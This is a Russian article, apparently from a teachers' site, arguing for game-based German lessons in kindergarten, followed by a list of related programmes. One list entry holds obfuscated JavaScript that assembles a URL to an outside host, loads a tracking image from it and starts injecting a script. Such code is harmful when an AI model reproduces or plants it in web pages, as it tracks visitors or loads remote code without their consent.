        Игра - это ведущий вид деятельности дошкольника, именно игра в этот период ведет за собой развитие дошкольника. Притом, что о детской игре написано уже очень много, вопросы теории ее так сложны, что единой классификации игр до сих пор не существует.

        Общение на иностранном языке должно быть мотивированным и целенаправленным. Необходимо создать у ребенка положительную психологическую установку на иноязычную речь. Способом создания такой положительной мотивации является игра. Игры в непосредственной образовательной деятельности не должны быть эпизодическими и изолированными. Необходима сквозная игровая методика, объединяющая и интегрирующая в себя другие виды деятельности в процессе обучения языку.

 В основе игровой методики лежат создание воображаемой ситуации и принятие ребенком или преподавателем той или иной роли.

Ребенок только-только научился говорить на родном языке, он общается с окружающими и увлечен познанием окружающего мира – значит, настало время первых слов на немецком, которые можно (если родители иногда выезжают за границу) сразу же опробовать на практике. Очень многое в его дальнейших успехах будет зависеть от первого немецкого пособия. Не секрет, что многие детские впечатления и привязанности формируют основные жизненные ориентиры, а значит, ни с преподавателем, ни с учебником ошибаться нельзя.
         Понятно, что детский учебник должен быть ярким, превосходно оформленным, с красочными запоминающимися картинками, развивающими ассоциативное мышление и память. Дети любят учить новые слова (фразы – следующий этап), так что для начала достаточно и учебного пособия, построенного по словарно-тематическому принципу. Большинство специалистов сходится во мнении, что ребенка необходимо отдавать на изучение иностранных языков как можно раньше, так как с возрастом ребенку все труднее и труднее становится запоминать новые слова, не говоря уже о языках. Несомненно, невероятные способности детей в плане запоминания иностранных языков с ранних лет – факт, с которым необходимо считаться. Как обычно, мнение родителей и специалистов порой расходятся, и последние считают, что изучение более одного языка может стать причиной перегрузки для ребенка, а это будет негативно сказываться на его самочувствии.

Такого не произойдет, если занятия с детьми в детском саду будут проводиться в игровой  форме, что содействует становлению их способностей и создает благоприятный психологический климат. Играя, дети легко усваивают сложные понятия, и изучение иностранного языка превращается в яркое увлекательное занятие.

        Именно в этот период у детей закладывается фундамент языковых и речевых способностей, необходимых для последующего изучения иностранного языка как средства межкультурного общения, что является основной целью обучения  в школе. Обучение в детском саду – первая ступень в реализации основной цели учебного предмета “Иностранный язык”, здесь закладываются основы коммуникативной компетенции.

        Приоритетным в детском саду является воспитательный и развивающий аспект обучения предмету. Иностранный язык вводит детей в мир другой культуры, ориентирует их на формирование навыка и умения самостоятельно решать простейшие коммуникативно-познавательные задачи в процессе говорения.

По моему мнению, существует целый ряд причин для преподавания немецкого языка в детском саду:

          - это самый благоприятный период для лингвистического развития ребёнка (вплоть до 8 лет) и это надо использовать для создания солидной базы по дальнейшему лингвистическому образованию;

           - раннее обучение детей дает возможность иметь максимум учебного времени для изучения английского как иностранного – чем раньше начать, тем больше времени мы имеем для его изучения;

           - с самого раннего возраста, знакомясь с культурой страны изучаемого языка, мы воспитываем в детях толерантность, терпимость, чувство сопричастности к другим людям;

           - изучение иностранного языка в раннем возрасте наряду с практической значимостью, развивает у детей способность лучше постигать и свой родной язык;

           - изучение иностранных языков улучшает память детей, их мышление, восприятие, воображение и т.д.

Следует учитывать тот факт, что малыши впитывают все новое, как губка. Замечено, что дети, которые рано научились какой-либо деятельности (в том числе и иностранному языку), если продолжают эти занятия, любят учиться, легко занимаются сами и никогда не мучаются от безделья и скуки

         Раннее обучение иностранному языку способствует полноценному развитию личности ребенка. Очевидно, что в современном мире это не мода, а жизненная необходимость.

В заключении отметим, что в не зависимости от того, сходятся родители во мнении со специалистами или нет, они должны запомнить, что:

  • детям намного легче изучать иностранные языки, чем взрослым;
  • у детей со знаниями иностранного языка значительно лучше память, сообразительность и они «ведут» своих ровесников в плане развития.

 РАБОЧАЯ ПРОГРАММА ПО РЕАЛИЗАЦИИ ДОПОЛНИТЕЛЬНОЙ ОБЩЕОБРАЗОВАТЕЛЬНОЙ ПРОГРАММЫ ПОЗНАВАТЕЛЬНО-РЕЧЕВОЙ НАПРАВЛЕННОСТИ ПО НЕМЕЦКОМУ ЯЗЫКУ «ГОВОРИМ И ПОЕМ НА НЕМЕЦКОМ» ПО ОБУЧЕНИЮ ДЕТЕЙ 5-7 ЛЕТ МАДОУ «ДС №2 «РЯБИНКА». М.Ф.СИЛИФОНОВА


По теме: методические разработки, презентации и конспекты

Рабочая программа по ФЭМП для дошкольников

  В российском образовании провозглашен сегодня принцип вариативности, который дает возможность педагогическим коллективам образовательных учреждений выбирать и конструировать педаго...

Рабочая программа по физическому развитию дошкольников 4-5 лет

Образовательная область "Физическая культура"...

Программа "Английский язык и дошкольник" для дошкольников изучающих английский язык

В связи с возрастающей учебной нагрузкой в детском саду, с одной стороны, и заинтересованностью родителей в изучении их детьми английского языка с другой, а также исходя из заботы о здоровье ре...

РАБОЧАЯ ПРОГРАММА «Английский язык для дошкольников» (5 -7 лет)

Данная рабочая программа по английскому языку для детского сада составлена на основе:Закона Российской Федерации «Об образовании» № 273-Ф от 29.12.2012;Примерной образовательной программы ...

Программа английский язык для дошкольников 6-7 лет (1 год обучения)

Учебная программа «Английский язык для детей» рассчитана на 1 учебный год 64 учебных часа , 2 часа в неделю. Возраст: 6 – 7 лет. Длительность занятий: 25 - 30 минут. Цель курса: развитие лин...

НОД "Настроение Джони" по дополнительной образовательной программе "Английский язык и дошкольник" в ДОУ

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'nxqkbdvu.lussoit.com\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.cre...

Рабочая программа тувинского языка

Сохранение и развитие языка – важнейшее политическое дело государственного, мирового масштаба. Ибо каждый язык, независимо от того, кому он принадлежит – или многочисленной нации, или мало...